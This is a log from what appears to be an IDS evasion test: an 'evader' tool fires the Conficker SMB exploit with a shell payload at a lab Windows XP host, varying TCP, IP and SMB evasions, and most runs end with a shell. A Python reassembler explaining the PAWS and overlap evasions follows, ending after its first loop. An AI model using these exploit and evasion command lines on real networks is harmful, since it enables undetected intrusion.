  1968. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11004 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=4E57Ty3TjkE --evasion=[start,smb_opentree]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","134958172","random_alphanum" --verifydelay=1000 --payload=shell
  1969. Info: Using random seed 4E57Ty3TjkH
  1970. The following evasions are applied from stage start to smb_opentree:
  1971. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1972. The duplicate packet has NULL bytes for payload
  1973. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1974. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 134958172> and has random alphanumeric bytes as payload
  1975.  
  1976. Info: NetBIOS connection 10.62.90.119:11004 -> 10.35.1.207:445
  1977. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1978. Info: Sending MSRPC request with exploit
  1979. Info: Shell found, attack succeeded
  1980. Info: CommandShell::SendCommand() - Failed to send string
  1981. Info: Command shell connection reset.
  1982. Info: Shell closed
  1983. 0: Success.
  1984. .........
  1985. 3377 runs averaging 1.96 runs / second ; progress: 1720/43200...............
  1986. 3392 runs averaging 1.97 runs / second ; progress: 1725/43200......................
  1987. 3414 runs averaging 1.97 runs / second ; progress: 1730/43200.....Pid 21788 timed out - killed
  1988. 2015-06-07 23:48:21 INFO
  1989. Timed out (10.62.90.114):
  1990. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60318 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=u0yyOW7fX0Q --evasion=[smb_connect,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  1991. Info: Using random seed u0yyOW7fX0S
  1992. The following evasions are applied from stage smb_connect to msrpc_req:
  1993. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1994. The duplicate packet has identical payload
  1995. The following evasions are applied from stage smb_openpipe to end:
  1996. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  1997.  
  1998. Info: NetBIOS connection 10.62.90.114:60318 -> 10.35.1.207:445
  1999. Terminated
  2000. ..............
  2001. 3434 runs averaging 1.98 runs / second ; progress: 1735/43200......
  2002. 3440 runs averaging 1.98 runs / second ; progress: 1740/43200......
  2003. 3446 runs averaging 1.97 runs / second ; progress: 1745/43200..........
  2004. 3456 runs averaging 1.97 runs / second ; progress: 1750/43200.....................
  2005. 3477 runs averaging 1.98 runs / second ; progress: 1755/43200.......
  2006. 3484 runs averaging 1.98 runs / second ; progress: 1760/43200....2015-06-07 23:48:55 INFO
  2007. Success. (10.62.90.115):
  2008. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25246 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=JW20JsGXHvY --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcreq" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
  2009. Info: Using random seed JW20JsGXHvY
  2010. The following evasions are applied from stage smb_connect to msrpc_req:
  2011. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  2012. The following evasions are applied from stage smb_openpipe to end:
  2013. - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  2014.  
  2015. Info: NetBIOS connection 10.62.90.115:25246 -> 10.35.1.207:445
  2016. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2017. Info: Sending MSRPC request with exploit
  2018. Info: Shell found, attack succeeded
  2019. Info: CommandShell::SendCommand() - Failed to send string
  2020. Info: Command shell connection reset.
  2021. Info: Shell closed
  2022. 0: Success.
  2023.  
  2024. 3489 runs averaging 1.98 runs / second ; progress: 1766/43200.........
  2025. 3498 runs averaging 1.98 runs / second ; progress: 1771/432002015-06-07 23:49:00 INFO
  2026. Success. (10.62.90.110):
  2027. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56190 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=0a5UmP7w6is --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","3","8","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
  2028. Info: Using random seed 0a5UmP7w6iv
  2029. The following evasions are applied from stage netbios_connect to msrpc_req:
  2030. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  2031. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  2032. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
  2033.  
  2034. Info: NetBIOS connection 10.62.90.110:56190 -> 10.35.1.207:445
  2035. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2036. Info: Sending MSRPC request with exploit
  2037. Info: Shell found, attack succeeded
  2038. Info: Shell closed
  2039. 0: Success.
  2040. 2015-06-07 23:49:01 INFO
  2041. Success. (10.62.90.115):
  2042. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41902 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q5L+wNSEXnI --evasion=[netbios_connect,end]tcp_paws,"50%","9","shuffle" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2043. Info: Using random seed Q5L+wNSEXnJ
  2044. The following evasions are applied from stage netbios_connect to end:
  2045. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
  2046. The following evasions are applied from stage smb_connect to smb_openpipe:
  2047. - TCP timestamps echo reply value is sent in the wrong endianness
  2048.  
  2049. Info: NetBIOS connection 10.62.90.115:41902 -> 10.35.1.207:445
  2050. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2051. Info: Sending MSRPC request with exploit
  2052. Info: Shell found, attack succeeded
  2053. Info: Shell closed
  2054. 0: Success.
  2055. ............
  2056. 3512 runs averaging 1.98 runs / second ; progress: 1776/43200....2015-06-07 23:49:08 INFO
  2057. Success. (10.62.90.118):
  2058. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15024 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=95HG3rTHFuU --evasion=[smb_connect,end]tcp_paws,"5","4","random" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2059. Info: Using random seed 95HG3rTHFuX
  2060. The following evasions are applied from stage netbios_connect to msrpc_bind:
  2061. - TCP timestamps echo reply value is sent in the wrong endianness
  2062. The following evasions are applied from stage smb_connect to end:
  2063. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  2064.  
  2065. Info: NetBIOS connection 10.62.90.118:15024 -> 10.35.1.207:445
  2066. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2067. Info: Sending MSRPC request with exploit
  2068. Info: Shell found, attack succeeded
  2069. Info: Shell closed
  2070. 0: Success.
  2071. ........
  2072. 3525 runs averaging 1.98 runs / second ; progress: 1781/43200.......2015-06-07 23:49:15 INFO
  2073. Success. (10.62.90.114):
  2074. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49718 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=v9g23QstAps --evasion=[msrpc_req,end]tcp_paws,"1","6","shuffle30" --evasion=[smb_opentree,smb_openpipe]tcp_urgent,"21","random" --verifydelay=1000 --payload=shell
  2075. Info: Using random seed v9g23QstApu
  2076. The following evasions are applied from stage smb_opentree to smb_openpipe:
  2077. - Add a random urgent data byte to every 21 TCP segment.
  2078. The following evasions are applied from stage msrpc_req to end:
  2079. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  2080.  
  2081. Info: NetBIOS connection 10.62.90.114:49718 -> 10.35.1.207:445
  2082. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2083. Info: Sending MSRPC request with exploit
  2084. Info: Shell found, attack succeeded
  2085. Info: Shell closed
  2086. 0: Success.
  2087.  
  2088. 3533 runs averaging 1.98 runs / second ; progress: 1786/43200...
  2089. 3536 runs averaging 1.97 runs / second ; progress: 1791/43200.........
  2090. 3545 runs averaging 1.97 runs / second ; progress: 1796/43200.............
  2091. 3558 runs averaging 1.98 runs / second ; progress: 1801/43200..Pid 22433 timed out - killed
  2092. 2015-06-07 23:49:31 INFO
  2093. Timed out (10.62.90.111):
  2094. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64787 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=dTcq453vXsM --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","3","5","random_msrpcbind" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
  2095. Info: Using random seed dTcq453vXsN
  2096. The following evasions are applied from stage smb_opentree to msrpc_req:
  2097. - Add a zero urgent data byte to every 8 TCP segment.
  2098. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2099. - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 5 bytes of MSRPC bind-like data.
  2100.  
  2101. Info: NetBIOS connection 10.62.90.111:64787 -> 10.35.1.207:445
  2102. Terminated
  2103. ......
  2104. 3567 runs averaging 1.98 runs / second ; progress: 1806/43200....
  2105. 3571 runs averaging 1.97 runs / second ; progress: 1811/43200.....2015-06-07 23:49:45 INFO
  2106. Success. (10.62.90.118):
  2107. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47268 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=EyGsPHL3uk8 --evasion=[smb_connect,end]ipv4_frag,"64" --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","268435455","random_alpha" --verifydelay=1000 --payload=shell
  2108. Info: Using random seed EyGsPHL3uk8
  2109. The following evasions are applied from stage smb_connect to end:
  2110. - IPv4 fragments with at most 64 bytes per fragment
  2111. The following evasions are applied from stage smb_opentree to msrpc_req:
  2112. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  2113. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2114. - The SMB filename is obfuscated:
  2115. * Dummy paths are added ( a/b -> a/c/../b )
  2116. * A 0x00 and random alphanumeric characters are appended to the filename
  2117.  
  2118. Info: NetBIOS connection 10.62.90.118:47268 -> 10.35.1.207:445
  2119. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2120. Info: Sending MSRPC request with exploit
  2121. Info: Shell found, attack succeeded
  2122. Info: CommandShell::SendCommand() - Failed to send string
  2123. Info: Command shell connection reset.
  2124. Info: Shell closed
  2125. 0: Success.
  2126. .
  2127. 3578 runs averaging 1.97 runs / second ; progress: 1816/43200.......2015-06-07 23:49:48 INFO
  2128. Success. (10.62.90.115):
  2129. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59606 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=uzhULV6jsqk --evasion=[start,end]tcp_initialseq,"2412100352" --evasion=[smb_opentree,end]tcp_paws,"5","162865477","shuffle30" --verifydelay=1000 --payload=shell
  2130. Info: Using random seed uzhULV6jsqm
  2131. - Initial TCP sequence number is set to 0xffffffff - 2412100352
  2132. The following evasions are applied from stage smb_opentree to end:
  2133. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162865477> and has 30 bytes of original payload, then shuffled original payload
  2134.  
  2135. Info: NetBIOS connection 10.62.90.115:59606 -> 10.35.1.207:445
  2136. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2137. Info: Sending MSRPC request with exploit
  2138. Info: Shell found, attack succeeded
  2139. Info: Shell closed
  2140. 0: Success.
  2141. ....2015-06-07 23:49:49 INFO
  2142. Success. (10.62.90.110):
  2143. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=cDSiqqCXSA0 --evasion=[netbios_connect,smb_connect]netbios_chaff,"5","empty_unspec|empty_keepalive|http_get" --evasion=[start,end]tcp_paws,"1","6","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","167083599","shuffle" --verifydelay=1000 --payload=shell
  2144. Info: Using random seed cDSiqqCXSA1
  2145. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
  2146. The following evasions are applied from stage netbios_connect to smb_opentree:
  2147. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 167083599> and has shuffled original payload
  2148. The following evasions are applied from stage netbios_connect to smb_connect:
  2149. - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
  2150.  
  2151. Info: NetBIOS connection 10.62.90.110:17836 -> 10.35.1.207:445
  2152. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2153. Info: Sending MSRPC request with exploit
  2154. Info: Shell found, attack succeeded
  2155. Info: Shell closed
  2156. 0: Success.
  2157. .....
  2158. 3596 runs averaging 1.98 runs / second ; progress: 1821/43200...........
  2159. 3607 runs averaging 1.98 runs / second ; progress: 1826/43200.............
  2160. 3620 runs averaging 1.98 runs / second ; progress: 1831/43200............
  2161. 3632 runs averaging 1.98 runs / second ; progress: 1836/43200.......
  2162. 3639 runs averaging 1.98 runs / second ; progress: 1841/43200.
  2163. 3640 runs averaging 1.97 runs / second ; progress: 1846/43200.Pid 23089 timed out - killed
  2164. 2015-06-07 23:50:20 INFO
  2165. Timed out (10.62.90.117):
  2166. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24335 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OwJGCORFO5M --evasion=msrpc_bigendian --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  2167. Info: Using random seed OwJGCORFO5M
  2168. The following evasions are applied from stage smb_opentree to msrpc_req:
  2169. - Add a random urgent data byte to every 2 TCP segment.
  2170. The following evasions are applied from stage msrpc_bind to end:
  2171. - MSRPC messages are sent in the big endian byte order
  2172.  
  2173. Info: NetBIOS connection 10.62.90.117:24335 -> 10.35.1.207:445
  2174. Terminated
  2175. ..
  2176. 3644 runs averaging 1.97 runs / second ; progress: 1851/43200...........
  2177. 3655 runs averaging 1.97 runs / second ; progress: 1856/43200..........
  2178. 3665 runs averaging 1.97 runs / second ; progress: 1861/43200..........
  2179. 3675 runs averaging 1.97 runs / second ; progress: 1866/43200..........
  2180. 3685 runs averaging 1.97 runs / second ; progress: 1871/43200........
  2181. 3693 runs averaging 1.97 runs / second ; progress: 1876/43200...............
  2182. 3708 runs averaging 1.97 runs / second ; progress: 1881/43200.........
  2183. 3717 runs averaging 1.97 runs / second ; progress: 1886/43200.....
  2184. 3722 runs averaging 1.97 runs / second ; progress: 1891/43200...2015-06-07 23:51:05 INFO
  2185. Success. (10.62.90.118):
  2186. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52841 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BoBFFh41OV0 --evasion=[smb_connect,end]smb_decoytrees,"6","7","2","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
  2187. Info: Using random seed BoBFFh41OV0
  2188. The following evasions are applied from stage smb_connect to end:
  2189. - Before normal SMB writes, 6 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  2190. The following evasions are applied from stage smb_opentree to smb_openpipe:
  2191.  
  2192.  
  2193. Info: NetBIOS connection 10.62.90.118:52841 -> 10.35.1.207:445
  2194. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2195. Info: Sending MSRPC request with exploit
  2196. Info: Shell found, attack succeeded
  2197. Info: Shell closed
  2198. 0: Success.
  2199.  
  2200. 3726 runs averaging 1.97 runs / second ; progress: 1896/43200........
  2201. 3734 runs averaging 1.96 runs / second ; progress: 1901/43200......
  2202. 3740 runs averaging 1.96 runs / second ; progress: 1906/43200..
  2203. 3742 runs averaging 1.96 runs / second ; progress: 1911/43200.
  2204. 3743 runs averaging 1.95 runs / second ; progress: 1916/43200....
  2205. 3747 runs averaging 1.95 runs / second ; progress: 1921/43200........
  2206. 3755 runs averaging 1.95 runs / second ; progress: 1926/43200.....
  2207. 3760 runs averaging 1.95 runs / second ; progress: 1931/43200.....
  2208. 3765 runs averaging 1.94 runs / second ; progress: 1936/43200..
  2209. 3767 runs averaging 1.94 runs / second ; progress: 1941/43200
  2210. 3767 runs averaging 1.94 runs / second ; progress: 1946/43200
  2211. 3767 runs averaging 1.93 runs / second ; progress: 1951/43200.Pid 24808 timed out - killed
  2212. 2015-06-07 23:52:06 INFO
  2213. Timed out (10.62.90.113):
  2214. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12134 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5K839hgA4vk --evasion=[netbios_connect,smb_opentree]ipv4_frag,"40" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2215. Info: Using random seed 5K839hgA4vn
  2216. The following evasions are applied from stage netbios_connect to smb_opentree:
  2217. - IPv4 fragments with at most 40 bytes per fragment
  2218. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2219. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2220.  
  2221. Info: NetBIOS connection 10.62.90.113:12134 -> 10.35.1.207:445
  2222. Terminated
  2223.  
  2224. 3769 runs averaging 1.93 runs / second ; progress: 1956/43200.........
  2225. 3778 runs averaging 1.93 runs / second ; progress: 1961/43200.....
  2226. 3783 runs averaging 1.92 runs / second ; progress: 1966/43200..........
  2227. 3793 runs averaging 1.92 runs / second ; progress: 1971/43200...
  2228. 3796 runs averaging 1.92 runs / second ; progress: 1976/43200
  2229. 3796 runs averaging 1.92 runs / second ; progress: 1981/43200Pid 25171 timed out - killed
  2230. 2015-06-07 23:52:33 INFO
  2231. Timed out (10.62.90.112):
  2232. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52248 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dytugDvpAqY --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","2","alpharandomized" --evasion=[netbios_connect,smb_opentree]tcp_segvar,"6","65535" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2233. Info: Using random seed dytugDvpAqZ
  2234. The following evasions are applied from stage netbios_connect to smb_opentree:
  2235. - TCP packets are segmented to contain between 6 and 65535 bytes of payload.
  2236. The following evasions are applied from stage smb_connect to msrpc_req:
  2237. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
  2238. The following evasions are applied from stage smb_connect to smb_openpipe:
  2239. - TCP timestamps echo reply value is sent in the wrong endianness
  2240.  
  2241. Info: NetBIOS connection 10.62.90.112:52248 -> 10.35.1.207:445
  2242. Terminated
  2243. .....
  2244. 3802 runs averaging 1.91 runs / second ; progress: 1986/43200.2015-06-07 23:52:37 INFO
  2245. Success. (10.62.90.112):
  2246. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36884 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=s9eB1BzGzzo --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","268435454","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2247. Info: Using random seed s9eB1BzGzzq
  2248. The following evasions are applied from stage netbios_connect to smb_opentree:
  2249. - TCP timestamps echo reply value is sent in the wrong endianness
  2250. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2251. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
  2252.  
  2253. Info: NetBIOS connection 10.62.90.112:36884 -> 10.35.1.207:445
  2254. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2255. Info: Sending MSRPC request with exploit
  2256. Info: Shell found, attack succeeded
  2257. Info: CommandShell::SendCommand() - Failed to send string
  2258. Info: Command shell connection reset.
  2259. Info: Shell closed
  2260. 0: Success.
  2261. .......
  2262. 3811 runs averaging 1.91 runs / second ; progress: 1991/43200...............
  2263. 3826 runs averaging 1.92 runs / second ; progress: 1996/43200....
  2264. 3830 runs averaging 1.91 runs / second ; progress: 2002/43200........
  2265. 3838 runs averaging 1.91 runs / second ; progress: 2007/43200........
  2266. 3846 runs averaging 1.91 runs / second ; progress: 2012/43200.............
  2267. 3859 runs averaging 1.91 runs / second ; progress: 2017/43200...Pid 25922 timed out - killed
  2268. 2015-06-07 23:53:10 INFO
  2269. Timed out (10.62.90.116):
  2270. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54207 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=h6bw8nvRfdk --evasion=[msrpc_bind,msrpc_req]tcp_order,"rand" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"7","new","zero" --evasion=[smb_openpipe,end]tcp_seg,"7" --verifydelay=1000 --payload=shell
  2271. Info: Using random seed h6bw8nvRfdm
  2272. The following evasions are applied from stage netbios_connect to msrpc_bind:
  2273. - TCP segments are set to overlap by 7 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  2274. The following evasions are applied from stage smb_openpipe to end:
  2275. - TCP packets are segmented to contain at most 7 bytes of payload.
  2276. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2277. - TCP segments produced by a single socket send() are sent in a random order
  2278.  
  2279. Info: NetBIOS connection 10.62.90.116:54207 -> 10.35.1.207:445
  2280. Terminated
  2281. ..
  2282. 3865 runs averaging 1.91 runs / second ; progress: 2022/43200.2015-06-07 23:53:13 INFO
  2283. Success. (10.62.90.113):
  2284. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11317 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QVdIvWYv1gI --evasion=[smb_opentree,end]tcp_paws,"3","7","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"5","random_alpha" --verifydelay=1000 --payload=shell
  2285. Info: Using random seed QVdIvWYv1gJ
  2286. The following evasions are applied from stage smb_opentree to end:
  2287. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
  2288. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  2289. - Add a random alphaurgent data byte to every 5 TCP segment.
  2290.  
  2291. Info: NetBIOS connection 10.62.90.113:11317 -> 10.35.1.207:445
  2292. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2293. Info: Sending MSRPC request with exploit
  2294. Info: Shell found, attack succeeded
  2295. Info: Shell closed
  2296. 0: Success.
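The tcp_paws runs above send, next to each real segment, a twin with the same sequence number and length, a timestamp far in the past and junk payload; a receiver that applies PAWS (RFC 7323) discards the twin, while an inspection engine that ignores TCP timestamps may keep its bytes. The tcp_overlap run a little earlier relies on the same kind of ambiguity at the byte level: two segments claim the same range with different contents. The following is an added example of mine, not the log's output or evader's code: a toy reassembler that can be run with either behaviour so the two reconstructed streams can be compared. The victim's actual overlap policy and whether evader sends the twin before or after the real segment are not stated in the log, so both are parameters; the handshake timestamp, sequence numbers and payload are constructed, and overlap_evasion encodes my reading of the tool's description of tcp_overlap.

```python
"""Toy TCP reassembler reproducing two evasions from the log: a duplicate
segment with an old timestamp (tcp_paws) and overlapping segments with
conflicting bytes (tcp_overlap). It shows that a middlebox which skips the
PAWS check, or resolves overlaps differently from the end host, reassembles
a different byte stream than the victim does."""
import random
from dataclasses import dataclass, field

ALPHA = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def ts_older(a, b):
    """True if 32-bit timestamp a lies before b (modular comparison, RFC 7323)."""
    return ((a - b) & 0xFFFFFFFF) >= 0x80000000


@dataclass
class Segment:
    seq: int
    data: bytes
    tsval: int


@dataclass
class Reassembler:
    """Minimal receiver: isn is the first data byte's sequence number and
    ts_recent the peer timestamp learned from the handshake (constructed)."""
    isn: int
    ts_recent: int
    enforce_paws: bool      # drop segments whose tsval is older than ts_recent
    overlap_policy: str     # "first": keep bytes already seen; "last": later segment wins
    buf: dict = field(default_factory=dict)   # absolute seq number -> byte value

    def receive(self, seg):
        if self.enforce_paws and ts_older(seg.tsval, self.ts_recent):
            return False                     # PAWS: discard the stale segment
        if not ts_older(seg.tsval, self.ts_recent):
            self.ts_recent = seg.tsval
        for i, b in enumerate(seg.data):
            pos = seg.seq + i
            if self.overlap_policy == "first" and pos in self.buf:
                continue
            self.buf[pos] = b
        return True

    def stream(self):
        """Contiguous bytes from isn onward, as the application would read them."""
        out, pos = bytearray(), self.isn
        while pos in self.buf:
            out.append(self.buf[pos])
            pos += 1
        return bytes(out)


def paws_evasion(payload, isn, ts0, delta, every=1, mss=8, decoy_first=True, rng=None):
    """tcp_paws,"<every>","<delta>","random_alpha": every `every`-th real segment
    gets a twin with the same seq and length, random alphabetic bytes and a
    timestamp `delta` ticks in the past. Whether the twin goes out before or
    after the real segment is not stated in the log, so it is a parameter."""
    rng = rng or random.Random(1)
    segs = []
    for k, off in enumerate(range(0, len(payload), mss)):
        real = Segment(isn + off, payload[off:off + mss], ts0 + 1 + k)
        if k % every:
            segs.append(real)
            continue
        junk = bytes(rng.choice(ALPHA) for _ in real.data)
        decoy = Segment(real.seq, junk, (real.tsval - delta) & 0xFFFFFFFF)
        segs.extend([decoy, real] if decoy_first else [real, decoy])
    return segs


def overlap_evasion(payload, isn, ts0, overlap=7, mss=16):
    """tcp_overlap,"<overlap>","new","zero", as I read the tool's description:
    each segment is padded with zero bytes that claim the first `overlap` bytes
    of the next segment's range; the next segment carries the correct bytes."""
    chunks = [payload[o:o + mss] for o in range(0, len(payload), mss)]
    segs = []
    for k, chunk in enumerate(chunks):
        pad = b"\x00" * min(overlap, len(chunks[k + 1])) if k + 1 < len(chunks) else b""
        segs.append(Segment(isn + k * mss, chunk + pad, ts0 + 1 + k))
    return segs


def deliver(segs, isn, ts0, enforce_paws, overlap_policy):
    """Feed the segments to one receiver and return what it reassembled."""
    r = Reassembler(isn, ts0, enforce_paws, overlap_policy)
    for s in segs:
        r.receive(s)
    return r.stream()


if __name__ == "__main__":
    payload = b"Sending MSRPC request with exploit payload"   # constructed
    ISN, TS0 = 1000, 5000
    for decoy_first in (True, False):
        segs = paws_evasion(payload, ISN, TS0, delta=268435453, decoy_first=decoy_first)
        print("decoy first" if decoy_first else "decoy last")
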